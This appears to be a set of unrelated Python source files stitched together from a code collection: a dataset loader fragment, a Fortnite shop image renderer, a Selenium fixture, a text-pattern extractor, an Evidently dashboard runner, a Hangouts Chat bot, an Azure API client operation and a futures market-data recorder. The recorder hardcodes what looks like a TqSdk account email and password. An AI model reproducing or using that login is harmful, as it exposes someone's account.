def __new__(cls, *args, shuffle_sequences: bool = None, **kwargs):
loader = _InteriorNetLoader(*args, **kwargs)
if shuffle_sequences:
loader = ShuffledLoader(loader, kwargs.get('seed', 42), shuffle_sequences=True)
return loader
def __init__(self, *args, **kwargs):
raise NotImplementedError()
if __name__ == '__main__':
import sys
    ll = InteriorNetLoader(sys.argv[1], split='train')
ll[0]
breakpoint()
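# A fuller sketch of iterating the loader (the dataset path is hypothetical):
# with InteriorNetLoader('/data/InteriorNet', split='train', sequence_size=20) as loader:
#     sample = loader[0]
#     frames, cameras = sample['frames'], sample['cameras']  # stacked images and camera poses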
|
the-stack_0_25951
|
import io
import aiofiles
import aiohttp
from PIL import Image, ImageFont, ImageDraw
def GetMiddle(x, y):
return (x - y) / 2
def GetBlendColor(Rarity):
if Rarity == "frozen":
blendColor = (148, 223, 255)
elif Rarity == "lava":
blendColor = (234, 141, 35)
elif Rarity == "legendary":
blendColor = (255, 255, 255)
elif Rarity == "dark":
blendColor = (251, 34, 223)
elif Rarity == "starwars":
blendColor = (231, 196, 19)
elif Rarity == "marvel":
blendColor = (197, 51, 52)
elif Rarity == "dc":
blendColor = (84, 117, 199)
elif Rarity == "icon":
blendColor = (54, 183, 183)
elif Rarity == "shadow":
blendColor = (113, 113, 113)
elif Rarity == "epic":
blendColor = (177, 91, 226)
elif Rarity == "rare":
blendColor = (73, 172, 242)
elif Rarity == "uncommon":
blendColor = (96, 170, 58)
elif Rarity == "common":
blendColor = (190, 190, 190)
elif Rarity == "slurp":
blendColor = (17, 189, 240)
else:
blendColor = (255, 255, 255)
return blendColor
async def GenerateShopImage(Store: dict, background_user: str = "https://peely.de/api/background.jpg",
text: str = "Fortnite Item Shop"):
# Featured items
FeaturedItemsCount = len(Store["featured"]['entries'])
F_Lines = 1
F_Height = (545 * F_Lines) + 20
F_Width = (300 * FeaturedItemsCount) + 20
while F_Width > F_Height:
F_Lines += 1
F_ImagesPerLine = round((FeaturedItemsCount / F_Lines) + 0.49)
F_Height = (545 * F_Lines) + 20
F_Width = (300 * F_ImagesPerLine) + 20
while ((F_Lines * F_ImagesPerLine) - FeaturedItemsCount) > F_ImagesPerLine or (
(F_Lines * F_ImagesPerLine) - FeaturedItemsCount) == F_ImagesPerLine:
F_Lines -= 1
F_Height = (545 * F_Lines) + 20
F_Width = (300 * F_ImagesPerLine) + 20
# Daily items
DailyItemsCount = len(Store["daily"]['entries'])
D_Lines = 1
D_Height = (545 * D_Lines)
D_Width = (300 * DailyItemsCount)
while D_Width > D_Height and D_Lines < F_Lines:
D_Lines += 1
D_ImagesPerLine = round(((DailyItemsCount) / D_Lines) + 0.49)
D_Height = (545 * D_Lines)
D_Width = (300 * D_ImagesPerLine)
while ((D_Lines * D_ImagesPerLine) - DailyItemsCount) > D_ImagesPerLine or (
(D_Lines * D_ImagesPerLine) - DailyItemsCount) == D_ImagesPerLine:
D_Lines -= 1
D_Width = (300 * D_ImagesPerLine)
# Open Background
async with aiohttp.ClientSession() as session:
async with session.get(background_user) as resp:
if resp.status == 200:
f = await aiofiles.open('assets/cache/temp.png', mode='wb')
await f.write(await resp.read())
await f.close()
Background = Image.open(
io.BytesIO(await (await aiofiles.open("assets/cache/temp.png", mode='rb')).read())).resize(
(int(F_Width + D_Width + 20 + 50), int(F_Height + 510)),
Image.ANTIALIAS)
Draw = ImageDraw.Draw(Background)
Burbank = ImageFont.truetype(f"assets/Fonts/BurbankBigCondensed-Black.otf", 100)
# Adspace
NewsAdpsace = Image.open(
io.BytesIO(await (await aiofiles.open("assets/Images/T_newPVP_Texture.png", mode='rb')).read()))
AdspaceFont = ImageFont.truetype('assets/Fonts/BurbankBigCondensed-Black.otf', 32)
def Adspace(X, Y, SpaceText):
X -= 14
Y -= 14
AdspaceLeft = NewsAdpsace.crop((0, 0, 23, 50))
AdspaceMiddle = NewsAdpsace.crop((23, 0, 66, 50)).resize((AdspaceFont.getsize(SpaceText)[0] - 15, 50),
Image.ANTIALIAS)
AdspaceRight = NewsAdpsace.crop((66, 0, 100, 50))
Background.paste(AdspaceLeft, (X, Y), AdspaceLeft)
Background.paste(AdspaceMiddle, (X + AdspaceLeft.width, Y), AdspaceMiddle)
Background.paste(AdspaceRight, (X + AdspaceLeft.width + AdspaceMiddle.width, Y), AdspaceRight)
AdspaceLeft = NewsAdpsace.crop((0, 0, 21, 50))
Draw.text((X + AdspaceLeft.width - 3, Y + 4), SpaceText, font=AdspaceFont)
# Pasting items
currentHeight = 510
currentWidth = 20
# Paste Featured
for Item in Store["featured"]['entries']:
card = await GenerateStoreCard(Item)
Background.paste(card, (currentWidth, currentHeight))
try:
if Item["banner"]:
Adspace(currentWidth, currentHeight, Item["banner"]['value'])
except KeyError:
pass
currentWidth += 300
if F_Width == currentWidth:
currentWidth = 20
currentHeight += 545
D_Width = Background.width - 20
dailyStarts = F_Width + 50
currentWidth = dailyStarts
currentHeight = 510
# Paste Daily
for Item in Store["daily"]['entries']:
card = await GenerateStoreCard(Item)
Background.paste(card, (currentWidth, currentHeight))
try:
if Item["banner"]:
Adspace(currentWidth, currentHeight, Item["banner"]['value'])
except KeyError:
pass
currentWidth += 300
if D_Width == currentWidth:
currentWidth = dailyStarts
currentHeight += 545
# Draw Featured and Daily
FMiddle = GetMiddle(F_Width, Burbank.getsize(Store['featured']['name'])[0])
Draw.text((FMiddle + 20, 350), Store['featured']['name'], (255, 255, 255), font=Burbank)
DMiddle = GetMiddle(Background.width - 20 - dailyStarts, Burbank.getsize(Store['daily']['name'])[0])
Draw.text((DMiddle + dailyStarts, 350), Store['daily']['name'], (255, 255, 255), font=Burbank)
# Draw Fortnite Item Shop
size = 300
BurbankBigCondensed = ImageFont.truetype(f"assets/Fonts/BurbankBigCondensed-Black.otf", size)
while Background.width <= BurbankBigCondensed.getsize(text)[0]:
size -= 1
BurbankBigCondensed = ImageFont.truetype(f"assets/Fonts/BurbankBigCondensed-Black.otf", size)
size -= 15
BurbankBigCondensed = ImageFont.truetype(f"assets/Fonts/BurbankBigCondensed-Black.otf", size)
Middle = GetMiddle(Background.width, BurbankBigCondensed.getsize(text)[0])
Draw.text((Middle, (375 - BurbankBigCondensed.getsize(text)[1])/2), text, (255, 255, 255), font=BurbankBigCondensed)
return Background
async def GenerateCard(Item):
card = Image.new("RGBA", (300, 545))
Draw = ImageDraw.Draw(card)
Name = Item["name"]
Rarity = Item["rarity"]['value']
blendColor = GetBlendColor(Rarity.lower())
Category = Item["type"]['value']
if Item["images"]["featured"]:
Icon = Item["images"]["featured"]
elif Item["images"]["icon"]:
Icon = Item["images"]["icon"]
elif Item["images"]["smallIcon"]:
Icon = Item["images"]["smallIcon"]
else:
print(Item["name"] + " Image not found!")
return card
try:
layer = Image.open(
io.BytesIO(await (await aiofiles.open(f"assets/Images/card_inside_{Rarity}.png", mode='rb')).read()))
except:
layer = Image.open(
io.BytesIO(await (await aiofiles.open("assets/Images/card_inside_common.png", mode='rb')).read()))
card.paste(layer)
# Download the Item icon
try:
async with aiohttp.ClientSession() as cs:
async with cs.get(Icon) as data:
Icon = Image.open(io.BytesIO(await data.read()))
except Exception as ex:
print("DOWNLOAD ITEM ICON ERROR", ex)
pass
if (Category == "outfit") or (Category == "emote"):
ratio = max(285 / Icon.width, 365 / Icon.height)
elif Category == "wrap":
ratio = max(230 / Icon.width, 310 / Icon.height)
else:
ratio = max(310 / Icon.width, 390 / Icon.height)
Icon = Icon.resize((int(Icon.width * ratio), int(Icon.height * ratio)), Image.ANTIALIAS)
Icon = Icon.convert("RGBA")
Middle = int((card.width - Icon.width) / 2) # Get the middle of card and icon
# Paste the image
if (Category == "outfit") or (Category == "emote"):
card.paste(Icon, (Middle, 0), Icon)
else:
card.paste(Icon, (Middle, 15), Icon)
try:
layer = Image.open(
io.BytesIO(await (await aiofiles.open(f"assets/Images/card_faceplate_{Rarity}.png", mode='rb')).read()))
except:
layer = Image.open(
io.BytesIO(await (await aiofiles.open("assets/Images/card_faceplate_common.png", mode='rb')).read()))
try:
card.paste(layer, layer)
except:
pass
BurbankBigCondensed = ImageFont.truetype(f"assets/Fonts/BurbankBigCondensed-Black.otf", 30)
textWidth = BurbankBigCondensed.getsize(f"{Item['type']['displayValue']}")[0]
Middle = int((card.width - textWidth) / 2)
Draw.text((Middle, 385), f"{Item['type']['displayValue']}", blendColor, font=BurbankBigCondensed)
FontSize = 56
while ImageFont.truetype(f"assets/Fonts/BurbankBigCondensed-Black.otf", FontSize).getsize(Name)[0] > 265:
FontSize -= 1
BurbankBigCondensed = ImageFont.truetype(f"assets/Fonts/BurbankBigCondensed-Black.otf", FontSize)
textWidth = BurbankBigCondensed.getsize(Name)[0]
change = 56 - FontSize
Middle = int((card.width - textWidth) / 2)
Top = 425 + change / 2
Draw.text((Middle, Top), Name, (255, 255, 0), font=BurbankBigCondensed)
return card
async def GenerateStoreCard(Item):
card = await GenerateCard(Item["items"][0])
Draw = ImageDraw.Draw(card)
Name = Item["items"][0]["name"]
if len(Item["items"]) > 1:
i = 0
for extra in Item["items"][1:]:
try:
                extraRarity = extra["rarity"]["value"]
extraIcon = extra["images"]["smallIcon"]
except:
pass
try:
layer = Image.open(io.BytesIO(
await (await aiofiles.open(f"assets/Images/box_bottom_{extraRarity}.png", mode='rb')).read()))
except:
layer = Image.open(
io.BytesIO(await (await aiofiles.open("assets/Images/box_bottom_common.png", mode='rb')).read()))
card.paste(layer, ((card.width - (layer.width + 9)), (9 + ((i // 1) * (layer.height)))))
# Download the icon
try:
async with aiohttp.ClientSession() as cs:
async with cs.get(extraIcon) as data:
extraIcon = Image.open(io.BytesIO(await data.read()))
except Exception as ex:
                print("ERROR WITH THE NORMAL ICON", ex)
pass
ratio = max(75 / extraIcon.width, 75 / extraIcon.height)
extraIcon = extraIcon.resize((int(extraIcon.width * ratio), int(extraIcon.height * ratio)), Image.ANTIALIAS)
# Paste icon
try:
layer = Image.open(io.BytesIO(
await (await aiofiles.open(f"assets/Images/box_faceplate_{extraRarity}.png", mode='rb')).read()))
except:
layer = Image.open(
io.BytesIO(await (await aiofiles.open("assets/Images/box_faceplate_common.png", mode='rb')).read()))
extraIcon = extraIcon.convert("RGBA")
card.paste(extraIcon, ((card.width - (layer.width + 9)), (9 + ((i // 1) * (extraIcon.height))),), extraIcon)
card.paste(layer, ((card.width - (layer.width + 9)), (9 + ((i // 1) * (layer.height)))), layer)
i += 1
vbucks = Image.open(io.BytesIO(await (await aiofiles.open("assets/Images/vbucks.png", mode='rb')).read()))
if Item["finalPrice"] == 0:
price = "Free"
else:
price = str(Item["finalPrice"])
BurbankBigCondensed = ImageFont.truetype(f"assets/Fonts/BurbankBigCondensed-Black.otf", 30)
textWidth = BurbankBigCondensed.getsize(price)[0]
Middle = int((card.width - ((textWidth - 5) - vbucks.width)) / 2)
Draw.text((Middle, 490), price, (255, 255, 255), font=BurbankBigCondensed)
Middle = int((card.width - (vbucks.width + (textWidth + 5))) / 2)
card.paste(vbucks, (Middle, 495), vbucks)
FontSize = 56
while ImageFont.truetype(f"assets/Fonts/BurbankBigCondensed-Black.otf", FontSize).getsize(Name)[0] > 265:
FontSize -= 1
BurbankBigCondensed = ImageFont.truetype(f"assets/Fonts/BurbankBigCondensed-Black.otf", FontSize)
textWidth = BurbankBigCondensed.getsize(Name)[0]
change = 56 - FontSize
Middle = int((card.width - textWidth) / 2)
Top = 425 + change / 2
Draw.text((Middle, Top), Name, (255, 255, 255), font=BurbankBigCondensed)
return card
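# Example usage (a minimal sketch; `shop` is assumed to already hold a dict with the
# "featured"/"daily" structure GenerateShopImage expects, fetched elsewhere, and the
# output file name is hypothetical):
# import asyncio
# async def main(shop: dict):
#     image = await GenerateShopImage(shop, text="Fortnite Item Shop")
#     image.save("itemshop.png")
# asyncio.run(main(shop))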
|
the-stack_0_25953
|
from selenium import webdriver
from fixture.session import SessionHelper
__author__ = 'Dzmitry'
class Application:
def __init__(self, browser, base_url):
if browser == "firefox":
self.wd = webdriver.Firefox()
elif browser == "chrome":
self.wd = webdriver.Chrome()
elif browser == "ie":
self.wd = webdriver.Ie()
elif browser == "opera":
self.wd = webdriver.Opera()
else:
raise ValueError("Unrecognized browser %s" % browser)
self.session = SessionHelper(self)
self.base_url = base_url
def is_valid(self):
try:
self.wd.current_url
return True
        except Exception:
            return False
def open_home_page(self):
wd = self.wd
wd.get(self.base_url)
def destroy(self):
self.wd.quit()
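# Illustrative usage sketch (not part of the original fixture): drives the
# Application class above directly. The browser choice and base URL are
# placeholder assumptions, not values taken from the project's configuration.
if __name__ == "__main__":
    app = Application(browser="chrome", base_url="http://localhost/addressbook/")
    try:
        app.open_home_page()
        print("session valid:", app.is_valid())
    finally:
        app.destroy()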
|
the-stack_0_25954
|
from maltreatment_nlp.patterns import ALL_PATTERNS
def run(text, **metadata):
for name, pat in ALL_PATTERNS.items():
for m in pat.finditer(text):
yield metadata | {
'pre_context': ' '.join(text[max(m.start() - 100, 0): m.start()].split()).strip(),
'post_context': ' '.join(text[m.end(): m.end() + 100].split()).strip(),
'term': m.group(),
'pattern': name,
}
def get_keys(**metadata):
"""Get all keys, e.g., for creating a csv file with csv.dictwriter"""
return ['pre_context', 'term', 'post_context', 'pattern'] + list(metadata.keys())
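# Illustrative example (an assumption, not part of the original module): writes
# the matches yielded by run() to a CSV file using the column order returned by
# get_keys(), as the docstring above suggests. The note text, metadata fields
# and output file name are placeholders; whether any pattern matches depends on
# ALL_PATTERNS.
if __name__ == "__main__":
    import csv
    note = "Example clinical note text to scan for maltreatment terms."
    meta = {"doc_id": "example-1"}
    with open("matches_example.csv", "w", newline="") as fh:
        writer = csv.DictWriter(fh, fieldnames=get_keys(**meta))
        writer.writeheader()
        for row in run(note, **meta):
            writer.writerow(row)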
|
the-stack_0_25957
|
# -*- coding: utf-8 -*-
"""
This file contains the constants used in the building energy demand calculations
"""
__author__ = "Gabriel Happle"
__copyright__ = "Copyright 2018, Architecture and Building Systems - ETH Zurich"
__credits__ = ["Gabriel Happle"]
__license__ = "MIT"
__version__ = "0.1"
__maintainer__ = "Daren Thomas"
__email__ = "[email protected]"
__status__ = "Production"
# all values are refactored from legacy Globalvars unless stated otherwise
# DEFAULT BUILDING GEOMETRY
H_F = 3.0 # average height per floor in m
D = 20.0 # in mm the diameter of the pipe to calculate losses
# SOLAR
RSE = 0.04 # thermal resistance of external surfaces according to ISO 6946
# HVAC SYSTEMS & VENTILATION
ETA_REC = 0.75 # constant efficiency of Heat recovery
DELTA_P_DIM = 5.0 # (Pa) dimensioning differential pressure for multi-storey building shielded from wind,
# according to DIN 1946-6
P_FAN = 0.55 # specific fan consumption in W/m3/h
MIN_VENTILATION_RATE = 0.6 # l/s/m2 [https://escholarship.org/content/qt7k1796zv/qt7k1796zv.pdf]
TEMPERATURE_ZONE_CONTROL_NIGHT_FLUSHING = 26 # (°C) night flushing only if temperature is higher than 26 # TODO review and make dynamic
DELTA_T_NIGHT_FLUSHING = 2 # (°C) night flushing only if outdoor temperature is two degrees lower than indoor according to SIA 382/1
SHIELDING_CLASS = 2 # according to ISO 16798-7, 0 = open terrain, 1 = partly shielded from wind,
# 2 = fully shielded from wind
TER_CLASS = 2 # terrain class of surroundings according to ISO 16798-7: 0 = open, 1 = rural, 2 = urban
RHO_AIR_REF = 1.23 # (kg/m3) constant from Table 12 in DIN 16798-7
TEMP_EXT_REF = 283 # (K) constant from Table 12 in DIN 16798-7
COEFF_TURB = 0.01 # (m/s) constant from Table 12 in DIN 16798-7
COEFF_WIND = 0.001 # (1/(m/s)) constant from Table 12 in DIN 16798-7
COEFF_STACK = 0.0035 # ((m/s)/(mK)) constant from Table 12 in DIN 16798-7
COEFF_D_WINDOW = 0.67 # (-), B.1.2.1 from annex B in DIN 16798-7 [1]
COEFF_D_VENT = 0.6 # flow coefficient for ventilation openings, B.1.2.1 in [1]
DELTA_C_P = 0.75 # (-), option 2 in B.1.3.4 from annex B in DIN 16798-7 [1]
DELTA_P_LEA_REF = 50 # air tightness index of the building envelope at reference pressure (Pa), B.1.3.14 in DIN 16798-7
DELTA_P_VENT_REF = 50 # air tightness index of the building envelope at reference pressure (Pa)
# FIXME no default value specified in standard
N_LEA = 0.667 # volumetric flow rate exponent for the leakage calculation, B.1.3.15 in DIN 16798-7
N_VENT = 0.5 # volumetric flow rate exponent for the ventilation calculation, B.1.2.2 in DIN 16798-7
# pumps ?
# TODO: Document
DELTA_P_1 = 0.1 # delta of pressure
F_SR = 0.3 # factor for pressure calculation
HOURS_OP = 5 # assuming around 2000 hours of operation per year. It is charged to the electrical system from 11 am to 4 pm
EFFI = 0.6 # efficiency of pumps
# WATER
FLOWTAP = 0.036 # in m3 == 12 l/min during 3 min every tap opening
TWW_SETPOINT = 60 # dhw tank set point temperature in C
# PHYSICAL
H_WE = 2466e3 # (J/kg) Latent heat of vaporization of water [section 6.3.6 in ISO 52016-1:2007]
C_A = 1006 # (J/(kg*K)) Specific heat of air at constant pressure [section 6.3.6 in ISO 52016-1:2007]
GR = 9.81 # m/s2 gravity
# RC-MODEL
B_F = 0.7 # reduction coefficient for the transmittance of surfaces in contact with the ground, according to SIA 380/1
H_IS = 3.45 # heat transfer coefficient between the air and the surface in W/(m2K)
H_MS = 9.1 # heat transfer coefficient between nodes m and s in W/m2K
LAMBDA_AT = 4.5 # dimensionless ratio between the internal surfaces area and the floor area from ISO 13790 Eq. 9
# RC-MODEL TEMPERATURE BOUNDS
T_WARNING_LOW = -30.0
T_WARNING_HIGH = 50.0
# SUPPLY AND RETURN TEMPERATURES OF REFRIGERATION SYSTEM
T_C_REF_SUP_0 = 1 # (°C) refactored from refrigeration loads, without original source
T_C_REF_RE_0 = 5 # (°C) refactored from refrigeration loads, without original source
# SUPPLY AND RETURN TEMPERATURES OF DATA CENTER COOLING SYSTEM
T_C_DATA_RE_0 = 15 # (°C) refactored from data center loads, without original source
T_C_DATA_SUP_0 = 7 # (°C) refactored from data center loads, without original source
VARIABLE_CEA_SCHEDULE_RELATION = {'Occ_m2pax': 'OCCUPANCY',
'Qs_Wpax': 'OCCUPANCY',
'X_ghpax': 'OCCUPANCY',
'Ve_lpspax': 'OCCUPANCY',
'Ea_Wm2': 'APPLIANCES',
'El_Wm2': 'LIGHTING',
'Ed_Wm2': 'SERVERS',
'Vww_lpdpax': 'WATER',
'Vw_lpdpax': 'WATER',
'Ths_set_C': 'HEATING',
'Tcs_set_C': 'COOLING',
'Qcre_Wm2': 'PROCESSES',
'Qhpro_Wm2': 'PROCESSES',
'Qcpro_Wm2': 'PROCESSES',
'Epro_Wm2': 'PROCESSES',
}
TEMPERATURE_VARIABLES = ['HEATING', 'COOLING']
PEOPLE_DEPENDENT_VARIABLES = ['OCCUPANCY', 'WATER']
AREA_DEPENDENT_VARIABLES = ['APPLIANCES', 'LIGHTING', 'PROCESSES', 'SERVERS']
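# Minimal illustrative lookup (not part of the original constants module): shows
# how the dictionaries above relate, i.e. mapping a demand variable to its CEA
# schedule type and checking which dependency group that schedule belongs to.
if __name__ == "__main__":
    variable = 'Ea_Wm2'
    schedule = VARIABLE_CEA_SCHEDULE_RELATION[variable]  # -> 'APPLIANCES'
    print(variable, '->', schedule,
          '| area-dependent:', schedule in AREA_DEPENDENT_VARIABLES,
          '| people-dependent:', schedule in PEOPLE_DEPENDENT_VARIABLES)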
|
the-stack_0_25960
|
from dataclasses import dataclass
from typing import List
from evidently.dashboard import Dashboard
from evidently.runner.runner import RunnerOptions, Runner
from evidently.tabs import DataDriftTab, CatTargetDriftTab, ClassificationPerformanceTab, \
NumTargetDriftTab, ProbClassificationPerformanceTab, RegressionPerformanceTab
@dataclass
class DashboardRunnerOptions(RunnerOptions):
dashboard_tabs: List[str]
tabs_mapping = dict(
data_drift=DataDriftTab,
cat_target_drift=CatTargetDriftTab,
classification_performance=ClassificationPerformanceTab,
prob_classification_performance=ProbClassificationPerformanceTab,
num_target_drift=NumTargetDriftTab,
regression_performance=RegressionPerformanceTab,
)
class DashboardRunner(Runner):
def __init__(self, options: DashboardRunnerOptions):
super().__init__(options)
self.options = options
def run(self):
(reference_data, production_data) = self._parse_data()
tabs = []
for tab in self.options.dashboard_tabs:
tab_class = tabs_mapping.get(tab, None)
if tab_class is None:
raise ValueError(f"Unknown tab {tab}")
tabs.append(tab_class)
dashboard = Dashboard(tabs=tabs)
dashboard.calculate(reference_data, production_data, self.options.column_mapping)
dashboard.save(self.options.output_path + ".html")
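# Minimal illustrative sketch (not part of the original module): resolves tab
# names to Dashboard tab classes the same way DashboardRunner.run() does above.
# Only the names present in tabs_mapping are valid; anything else raises
# ValueError in run().
if __name__ == "__main__":
    requested = ["data_drift", "regression_performance"]
    resolved = [tabs_mapping[name] for name in requested]
    print([tab.__name__ for tab in resolved])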
|
the-stack_0_25961
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pylint: disable=invalid-name
"""
Simple Hangouts Chat bot that responds to events and
messages from a room.
"""
# [START basic-bot]
import logging
from flask import Flask, render_template, request, json
app = Flask(__name__)
@app.route('/', methods=['POST'])
def home_post():
"""Respond to POST requests to this endpoint.
All requests sent to this endpoint from Hangouts Chat are POST
requests.
"""
data = request.get_json()
resp = None
if data['type'] == 'REMOVED_FROM_SPACE':
logging.info('Bot removed from a space')
else:
resp_dict = format_response(data)
resp = json.jsonify(resp_dict)
return resp
def format_response(event):
"""Determine what response to provide based upon event data.
Args:
event: A dictionary with the event data.
"""
text = ""
# Case 1: The bot was added to a room
if event['type'] == 'ADDED_TO_SPACE' and event['space']['type'] == 'ROOM':
text = 'Thanks for adding me to "%s"!' % event['space']['displayName']
# Case 2: The bot was added to a DM
elif event['type'] == 'ADDED_TO_SPACE' and event['space']['type'] == 'DM':
text = 'Thanks for adding me to a DM, %s!' % event['user']['displayName']
elif event['type'] == 'MESSAGE':
text = 'Your message: "%s"' % event['message']['text']
return {'text': text}
# [END basic-bot]
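# Illustrative self-check (not part of the original sample): calls
# format_response() with a synthetic MESSAGE event shaped like the payloads
# Hangouts Chat sends; the field values below are placeholders.
def _demo_format_response():
    event = {
        'type': 'MESSAGE',
        'space': {'type': 'ROOM', 'displayName': 'Demo room'},
        'user': {'displayName': 'Demo user'},
        'message': {'text': 'hello bot'},
    }
    assert format_response(event) == {'text': 'Your message: "hello bot"'}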
@app.route('/', methods=['GET'])
def home_get():
"""Respond to GET requests to this endpoint.
This function responds to requests with a simple HTML landing page for this
App Engine instance.
"""
return render_template('home.html')
if __name__ == '__main__':
# This is used when running locally. Gunicorn is used to run the
# application on Google App Engine. See entrypoint in app.yaml.
app.run(host='127.0.0.1', port=8080, debug=True)
|
the-stack_0_25962
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class ApiExportOperations:
"""ApiExportOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.apimanagement.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def get(
self,
resource_group_name: str,
service_name: str,
api_id: str,
format: Union[str, "_models.ExportFormat"],
export: Union[str, "_models.ExportApi"],
**kwargs
) -> "_models.ApiExportResult":
"""Gets the details of the API specified by its identifier in the format specified to the Storage
Blob with SAS Key valid for 5 minutes.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param service_name: The name of the API Management service.
:type service_name: str
:param api_id: API revision identifier. Must be unique in the current API Management service
instance. Non-current revision has ;rev=n as a suffix where n is the revision number.
:type api_id: str
:param format: Format in which to export the Api Details to the Storage Blob with Sas Key valid
for 5 minutes.
:type format: str or ~azure.mgmt.apimanagement.models.ExportFormat
:param export: Query parameter required to export the API details.
:type export: str or ~azure.mgmt.apimanagement.models.ExportApi
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ApiExportResult, or the result of cls(response)
:rtype: ~azure.mgmt.apimanagement.models.ApiExportResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ApiExportResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-12-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'serviceName': self._serialize.url("service_name", service_name, 'str', max_length=50, min_length=1, pattern=r'^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$'),
'apiId': self._serialize.url("api_id", api_id, 'str', max_length=256, min_length=1, pattern=r'^[^*#&+:<>?]+$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['format'] = self._serialize.query("format", format, 'str')
query_parameters['export'] = self._serialize.query("export", export, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('ApiExportResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ApiManagement/service/{serviceName}/apis/{apiId}'} # type: ignore
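# Illustrative usage sketch (not generated code): how this operation group is
# typically reached through the service client. The client and credential class
# names (ApiManagementClient, DefaultAzureCredential) and all resource names
# below are assumptions for the example and are not defined in this file.
async def _example_export_api():
    from azure.identity.aio import DefaultAzureCredential
    from azure.mgmt.apimanagement.aio import ApiManagementClient
    async with DefaultAzureCredential() as credential:
        async with ApiManagementClient(credential, "<subscription-id>") as client:
            # Export the API definition; the result contains a SAS link valid for 5 minutes.
            result = await client.api_export.get(
                resource_group_name="my-resource-group",
                service_name="my-apim-service",
                api_id="echo-api",
                format="openapi-link",
                export="true",
            )
            print(result)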
|
the-stack_0_25964
|
import tqsdk
import thostmduserapi as mdapi
import redis
import whfunc
import tqsdk
import re
import time
import queue
from tqsdk.tafunc import time_to_str
from tq_md_objs import TQ_md_class,CFtdcMdSpi
import schedule
当前交易日="00000000"
def 启动行情记录2(symbol_list,list_duration_seconds,行情类型="TQ",redis_con=None,天勤连接=None,通达信连接=None,data_length=2000,行情地址="tcp://101.230.209.178:53313",md_subscription_name="gaoctp"):
global 当前交易日
存储tick队列=queue.Queue()
if not redis_con:
redis_con=redis.Redis(db=15)
while True:
天勤连接=tqsdk.TqApi(auth="[email protected],24729220a")
if 行情类型=="TQ":
单symbol_dict=set()
需要订阅的CTPsymbol=[]
订阅中的主连合约={}
订阅中的主连合约_反向={}
订阅中的指数合约={}
天勤需要添加的合约=[]
for x in symbol_list:
if "KQ.m" in x:
订阅中的主连合约[x]=天勤连接.get_quote(x).underlying_symbol
需要订阅的CTPsymbol.append(订阅中的主连合约[x])
天勤需要添加的合约.append(订阅中的主连合约[x])
elif "KQ.i" in x:
symbol=x.split("@")[1]
订阅中的指数合约[x]= [ y for y in 天勤连接._data['quotes'] if 天勤连接._data['quotes'][y]["expired"]==False and re.findall("^"+symbol+"[0-9]{3,4}$",y) ]
需要订阅的CTPsymbol+=订阅中的指数合约[x]
天勤需要添加的合约+=订阅中的指数合约[x]
list_duration_seconds.append(86400)
else:
需要订阅的CTPsymbol.append(x)
单symbol_dict.add(x)
symbol_list= list(set(symbol_list+天勤需要添加的合约))
订阅中的主连合约_反向={ 订阅中的主连合约[x]:x for x in 订阅中的主连合约}
list_duration_seconds=list(set(list_duration_seconds))
天勤=TQ_md_class(symbol_list,list_duration_seconds,天勤连接,redis_con,data_length,md_subscription_name)
        # create an instance of the original CTP market data API
mduserapi=mdapi.CThostFtdcMdApi_CreateFtdcMdApi()
        # create a connection instance of the custom market data Spi class
mduserspi=CFtdcMdSpi(mduserapi,存储tick队列,需要订阅的CTPsymbol)
        # set the front (connection) address for the API instance
mduserapi.RegisterFront(行情地址)
mduserapi.RegisterSpi(mduserspi)
        # start the connection thread
mduserapi.Init()
        # block the thread (main processing loop below)
